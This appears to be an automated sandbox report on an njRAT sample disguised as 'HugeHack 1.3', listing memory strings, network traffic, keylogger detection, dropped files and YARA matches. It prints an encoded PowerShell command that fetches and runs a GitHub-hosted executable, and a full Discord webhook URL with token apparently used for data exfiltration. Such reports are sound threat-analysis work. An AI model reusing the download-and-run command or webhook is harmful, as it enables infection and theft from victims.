Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: webhook.exe, 00000003.00000002.1464487192.0000000006700000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmsk-sk
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000005.00000003.1354265335.00000000189CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3702244002.00000000189CD000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.00000000189C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitE
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingc
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000008.00000002.1903364315.0000000004819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/d
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/???
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Payload.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: dllhost.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: ClickMe.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=			Jump to behavior

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
